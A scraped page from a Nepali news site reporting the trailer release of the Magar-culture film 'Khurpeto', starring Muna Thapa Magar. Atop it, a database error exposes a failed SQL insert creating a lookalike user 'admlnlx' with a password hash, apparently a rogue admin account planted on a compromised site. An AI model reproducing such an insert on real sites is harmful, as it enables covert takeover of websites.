WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BhzJtsgJ33EKdFG5f4v4XZpj0hUEIT/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-04 21:50:09', '', 'admlnlx', 'admlnlx')


Warning: Trying to access array offset on value of type bool in /home/gaulekhabar.com/public_html/wp-content/themes/nepali-news-portal/header.php on line 21
लोक गायिका मुना थापा अभिनित चलचित्र ‘खुर्पेटो’ को ट्रेलर सार्वजनिक – Gaule Khabar

लोक गायिका मुना थापा अभिनित चलचित्र ‘खुर्पेटो’ को ट्रेलर सार्वजनिक

लोक गायिका मुना थापा अभिनित चलचित्र ‘खुर्पेटो’ को ट्रेलर सार्वजनिक

काठमाडौं,पुस ६-

मगर जातीको संस्कृतिलाई समेटेर निर्माण गरिएको पहिलो कथानक चलचित्र ‘खुर्पेटो’ को ट्रेलर सार्वजनिक भएको छ ।

मिनेट २५ सेकेन्ड लामो ट्रेलर युट्युबमार्फत सार्वजनिक गरिएको हो । चलचित्रमा लोकदोहोरी गायिका मुना थापा मगर, सुजन थापा, बिना थापा, टिका आले लगायतको अभिनय छ ।

चलचित्रलाई विकास मगरले निर्देशन गरेका छन् ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका